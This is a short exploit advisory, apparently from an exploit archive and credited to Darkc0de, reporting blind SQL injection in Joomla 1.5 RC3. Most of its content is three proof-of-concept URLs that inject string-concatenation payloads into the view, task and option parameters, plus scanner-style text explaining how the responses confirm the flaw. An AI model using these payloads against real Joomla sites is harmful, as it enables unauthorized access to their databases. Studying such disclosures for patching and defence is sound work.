joomla15-blindsql.txt

`Thanks to team of Darkc0de.com  
  
Blind Sql-Injection in Joomla 1.5 RC3  
  
URL : http://localhost/index.php  
  
1. Parameter = view  
  
The following changes were applied to the original request:  
• Set parameter 'view's value to 'somechars'%20+%20'article'  
  
  
POC URL : http://localhost/index.php?option=com_content&view=somechars'%20+%20'article&id=25&Itemid=28  
  
This test uses several different HTTP requests in order to verify the existence of a Blind SQL  
Injection vulnerability. The resulting test responses show that requests containing conditions with  
the same logical values were identical to the original valid response, and the responses with  
different values were not. This indicates that an SQL query is being executed at the back-end  
database, and that the injected values affect the original query  
  
2. Parameter = task  
  
The following changes were applied to the original request:  
• Set parameter 'task's value to 'somechars%27+%2B+%27search'  
  
  
POC URL : http://localhost/index.php?searchword=&task=somechars%27+%2B+%27search&option=com_search  
  
3. Parameter = option  
  
The following changes were applied to the original request:  
• Set parameter 'option's value to 'somechars%27+%2B+%27com_search'  
  
POC URL :http://localhost/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search  
  
~~~~~~~~~~mail : [email protected]~~~~~~~~~~~~~~~~  
  
`